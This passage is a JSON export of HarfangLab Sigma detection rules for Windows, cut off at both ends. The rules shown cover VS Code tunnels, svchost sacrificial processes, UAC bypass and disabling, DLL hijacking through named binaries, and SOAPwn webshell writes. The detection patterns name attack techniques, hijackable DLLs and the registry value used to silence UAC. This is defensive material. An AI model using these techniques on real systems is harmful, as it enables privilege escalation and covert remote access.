"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.603629Z",
"creation_date": "2026-03-23T11:45:34.603632Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.603639Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.sentinelone.com/labs/operation-digital-eye-chinese-apt-compromises-critical-digital-infrastructure-via-visual-studio-code-tunnels/",
"https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/",
"https://ipfyx.fr/post/visual-studio-code-tunnel/",
"https://code.visualstudio.com/docs/remote/tunnels",
"https://attack.mitre.org/techniques/T1572/",
"https://attack.mitre.org/techniques/T1090/",
"https://attack.mitre.org/techniques/T1567/"
],
"name": "t1090_vs_code_tunnel_commandline.yml",
"content": "title: VSCode Proxy Tunnel Started via Command-line (Windows)\nid: 17d344bd-5969-438e-b896-775f30a96618\ndescription: |\n This rule detects the VSCode binary being used with a command-line indicating a network tunnel.\n Since July 2023, Microsoft has added a feature that allows users to share their Visual Studio Desktop on the web through its own tunnel.\n This allows attackers to connect to a remote machine and potentially bypass any network counter-measures.\n It is recommended to investigate the actions performed in the shell that this tunnel spawns to determine if it is legitimate developer activity.\nreferences:\n - https://www.sentinelone.com/labs/operation-digital-eye-chinese-apt-compromises-critical-digital-infrastructure-via-visual-studio-code-tunnels/\n - https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/\n - https://ipfyx.fr/post/visual-studio-code-tunnel/\n - https://code.visualstudio.com/docs/remote/tunnels\n - https://attack.mitre.org/techniques/T1572/\n - https://attack.mitre.org/techniques/T1090/\n - https://attack.mitre.org/techniques/T1567/\ndate: 2023/09/25\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1090\n - attack.t1572\n - attack.exfiltration\n - attack.t1567\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Tunneling\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_cmd:\n CommandLine|contains: ' tunnel'\n\n selection_image:\n Image|endswith:\n - '\\code.exe'\n - '\\codium.exe'\n Signed: 'true'\n\n selection_peinfo:\n OriginalFileName: 'electron.exe'\n Description: 'Visual Studio Code'\n\n condition: selection_cmd and (selection_image or selection_peinfo)\nlevel: high\n#level: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "17d344bd-5969-438e-b896-775f30a96618",
"rule_name": "VSCode Proxy Tunnel Started via Command-line (Windows)",
"rule_description": "This rule detects the VSCode binary being used with a command-line indicating a network tunnel.\nSince July 2023, Microsoft has added a feature that allows users to share their Visual Studio Desktop on the web through its own tunnel.\nThis allows attackers to connect to a remote machine and potentially bypass any network counter-measures.\nIt is recommended to investigate the actions performed in the shell that this tunnel spawns to determine if it is legitimate developer activity.\n",
"rule_creation_date": "2023-09-25",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1090",
"attack.t1567",
"attack.t1572"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "18048693-66e0-4701-b874-e81772fd4433",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627316Z",
"creation_date": "2026-03-23T11:45:34.627318Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627323Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cybersync.org/blogs-en/hunting_cobalt_strike_in_memory",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_sacrificial_process_svchost.yml",
"content": "title: Svchost.exe Sacrificial Process Spawned\nid: 18048693-66e0-4701-b874-e81772fd4433\ndescription: |\n Detects the suspicious execution of the legitimate svchost.exe Windows binary, spawned without arguments. This can mean that the binary is being used as a sacrificial process.\n Such processes are spawned and malicious code is immediately injected into them for nefarious purposes.\n This technique is used, for example, by Cobalt Strike.\n It is recommended to investigate the parent process performing this action and the destination IP address of the svchost.exe process to determine the legitimacy of this behavior.\nreferences:\n - https://cybersync.org/blogs-en/hunting_cobalt_strike_in_memory\n - https://attack.mitre.org/techniques/T1055/\ndate: 2024/03/29\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SacrificialProcess\n - classification.Windows.Behavior.ProcessTampering\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine: '?:\\Windows\\system32\\svchost.exe'\n\n # This is handled by the rule 2fe027bc-7a3c-412a-9493-8581215d5157\n filter_computrace:\n ParentImage:\n - '?:\\Windows\\System32\\rpcnetp.exe'\n - '?:\\Windows\\SysWOW64\\rpcnet.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "18048693-66e0-4701-b874-e81772fd4433",
"rule_name": "Svchost.exe Sacrificial Process Spawned",
"rule_description": "Detects the suspicious execution of the legitimate svchost.exe Windows binary, spawned without arguments. This can mean that the binary is being used as a sacrificial process.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nThis technique is used, for example, by Cobalt Strike.\nIt is recommended to investigate the parent process performing this action and the destination IP address of the svchost.exe process to determine the legitimacy of this behavior.\n",
"rule_creation_date": "2024-03-29",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1827b106-4555-4cda-9f03-7095766f3505",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074260Z",
"creation_date": "2026-03-23T11:45:34.074262Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074267Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.greyhathacker.net/?p=796",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_post_uac_bypass_cliconfg.yml",
"content": "title: UAC Bypass Executed via cliconfg\nid: 1827b106-4555-4cda-9f03-7095766f3505\ndescription: |\n Detects a process being spawned by cliconfg.exe.\n Cliconfg.exe does not normally spawn any process; this action is probably the result of a UAC bypass attempt.\n Adversaries may bypass UAC mechanisms to elevate process privileges on a system to perform a task under administrator-level permissions.\n It is recommended to investigate the context of this action to determine its legitimacy.\nreferences:\n - https://www.greyhathacker.net/?p=796\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2020/11/17\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\cliconfg.exe'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1827b106-4555-4cda-9f03-7095766f3505",
"rule_name": "UAC Bypass Executed via cliconfg",
"rule_description": "Detects a process being spawned by cliconfg.exe.\nCliconfg.exe does not normally spawn any process; this action is probably the result of a UAC bypass attempt.\nAdversaries may bypass UAC mechanisms to elevate process privileges on a system to perform a task under administrator-level permissions.\nIt is recommended to investigate the context of this action to determine its legitimacy.\n",
"rule_creation_date": "2020-11-17",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "18606208-5435-42c6-b17a-7b5ceacc248e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618797Z",
"creation_date": "2026-03-23T11:45:34.618799Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618804Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/en_us/research/24/c/earth-krahang.html",
"https://redalert.nshc.net/2019/07/25/growth-of-sectorf01-groups-cyber-espionage-activities/",
"https://unit42.paloaltonetworks.com/dll-hijacking-techniques/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_fontsets.yml",
"content": "title: DLL Hijacking via FontSets.exe\nid: 18606208-5435-42c6-b17a-7b5ceacc248e\ndescription: |\n Detects potential Windows DLL Hijacking via FontSets.exe related to Neuber Software Typograf font manager.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.trendmicro.com/en_us/research/24/c/earth-krahang.html\n - https://redalert.nshc.net/2019/07/25/growth-of-sectorf01-groups-cyber-espionage-activities/\n - https://unit42.paloaltonetworks.com/dll-hijacking-techniques/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/03/20\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ttfman.exe'\n ImageLoaded|endswith: '\\FaultRep.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\typograf\\'\n - '?:\\Program Files (x86)\\typograf\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\typograf\\'\n - '?:\\Program Files (x86)\\typograf\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'A. & M. Neuber Software'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "18606208-5435-42c6-b17a-7b5ceacc248e",
"rule_name": "DLL Hijacking via FontSets.exe",
"rule_description": "Detects potential Windows DLL Hijacking via FontSets.exe related to Neuber Software Typograf font manager.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2024-03-20",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1878e97a-df8d-4dd8-82f0-e84edc867171",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623606Z",
"creation_date": "2026-03-23T11:45:34.623608Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623612Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://labs.watchtowr.com/soapwn-pwning-net-framework-applications-through-http-client-proxies-and-wsdl/?1",
"https://attack.mitre.org/techniques/T1190/"
],
"name": "t1190_soapwn.yml",
"content": "title: IIS SOAPwn Vulnerability Exploited\nid: 1878e97a-df8d-4dd8-82f0-e84edc867171\ndescription: |\n Detects a suspicious file creation or modification potentially caused by .NET Framework SOAP/WSDL proxy abuse (SOAPwn).\n Vulnerable applications may be coerced into writing arbitrary files via attacker-controlled WSDL or proxy URLs using non-HTTP schemes.\n It is recommended to analyze the content of the XML file for any suspicious content related to a webshell.\nreferences:\n - https://labs.watchtowr.com/soapwn-pwning-net-framework-applications-through-http-client-proxies-and-wsdl/?1\n - https://attack.mitre.org/techniques/T1190/\ndate: 2025/12/12\nmodified: 2026/01/27\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1190\n - attack.persistence\n - attack.t1505.003\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: filesystem_event\ndetection:\n selection:\n Kind: 'write'\n ProcessImage|endswith:\n - '\\w3wp.exe'\n - '\\iisexpress.exe'\n - '\\dotnet.exe'\n FirstBytes|startswith: '3c3f786d6c20'\n Path|endswith:\n - '.cshtml'\n - '.aspx'\n - '.asp'\n - '.ashx'\n - '.asmx'\n - '.ascx'\n - '.asax'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1878e97a-df8d-4dd8-82f0-e84edc867171",
"rule_name": "IIS SOAPwn Vulnerability Exploited",
"rule_description": "Detects a suspicious file creation or modification potentially caused by .NET Framework SOAP/WSDL proxy abuse (SOAPwn).\nVulnerable applications may be coerced into writing arbitrary files via attacker-controlled WSDL or proxy URLs using non-HTTP schemes.\nIt is recommended to analyze the content of the XML file for any suspicious content related to a webshell.\n",
"rule_creation_date": "2025-12-12",
"rule_modified_date": "2026-01-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.initial_access",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1190",
"attack.t1505.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "189eeb83-5aec-4186-97ea-ad22929a4f15",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.610304Z",
"creation_date": "2026-03-23T11:45:34.610308Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.610315Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/windows/security/application-security/application-control/user-account-control/settings-and-configuration",
"https://medium.com/@boutnaru/the-windows-process-journey-useraccountcontrolsettings-exe-3d8b88cc944d",
"https://attack.mitre.org/techniques/T1548/"
],
"name": "t1548_uac_consent_config_disabled_manually.yml",
"content": "title: UAC Registry Configuration Disabled Manually\nid: 189eeb83-5aec-4186-97ea-ad22929a4f15\ndescription: |\n Detects a change in the User Account Control registry configuration.\n This rule detects the complete disabling of the UAC consent window performed manually via the legitimate UserAccountControlSettings.exe binary.\n Attackers may change this configuration in order to locally elevate privileges quietly or allow future attackers to do so.\n It is recommended to investigate actions taken during this user session, to look for subsequent suspicious actions performed on the host and to determine whether the user performing these actions has been compromised.\nreferences:\n - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/user-account-control/settings-and-configuration\n - https://medium.com/@boutnaru/the-windows-process-journey-useraccountcontrolsettings-exe-3d8b88cc944d\n - https://attack.mitre.org/techniques/T1548/\ndate: 2024/10/23\nmodified: 2025/10/03\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.ImpairDefenses\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ConsentPromptBehaviorAdmin'\n Details: 'DWORD (0x00000000)'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\DllHost.exe /Processid:{EA2C6B24-C590-457B-BAC8-4A0F9B13B5B8}'\n - '?:\\Windows\\SysWOW64\\DllHost.exe /Processid:{EA2C6B24-C590-457B-BAC8-4A0F9B13B5B8}'\n\n condition: selection\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "189eeb83-5aec-4186-97ea-ad22929a4f15",
"rule_name": "UAC Registry Configuration Disabled Manually",
"rule_description": "Detects a change in the User Account Control registry configuration.\nThis rule detects the complete disabling of the UAC consent window performed manually via the legitimate UserAccountControlSettings.exe binary.\nAttackers may change this configuration in order to locally elevate privileges quietly or allow future attackers to do so.\nIt is recommended to investigate actions taken during this user session, to look for subsequent suspicious actions performed on the host and to determine whether the user performing these actions has been compromised.\n",
"rule_creation_date": "2024-10-23",
"rule_modified_date": "2025-10-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "18ae8604-550e-4ae2-a46b-dd87ad258288",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.602362Z",
"creation_date": "2026-03-23T11:45:34.602366Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.602373Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_ehstorauthn.yml",
"content": "title: DLL Hijacking via ehstorauthn.exe\nid: 18ae8604-550e-4ae2-a46b-dd87ad258288\ndescription: |\n Detects potential Windows DLL Hijacking via ehstorauthn.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ehstorauthn.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\UxTheme.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "18ae8604-550e-4ae2-a46b-dd87ad258288",
"rule_name": "DLL Hijacking via ehstorauthn.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ehstorauthn.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "18fb7194-8782-460e-b4ef-73265aabdd6b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.591625Z",
"creation_date": "2026-03-23T11:45:34.591628Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.591636Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_rmttpmvscmgrsvr.yml",
"content": "title: DLL Hijacking via rmttpmvscmgrsvr.exe\nid: 18fb7194-8782-460e-b4ef-73265aabdd6b\ndescription: |\n Detects potential Windows DLL Hijacking via rmttpmvscmgrsvr.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'rmttpmvscmgrsvr.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DEVOBJ.dll'\n - '\\profapi.dll'\n - '\\winscard.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "18fb7194-8782-460e-b4ef-73265aabdd6b",
"rule_name": "DLL Hijacking via rmttpmvscmgrsvr.exe",
"rule_description": "Detects potential Windows DLL Hijacking via rmttpmvscmgrsvr.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting a malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "191f1aa8-40cc-4b37-b39c-8821d11b97d5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
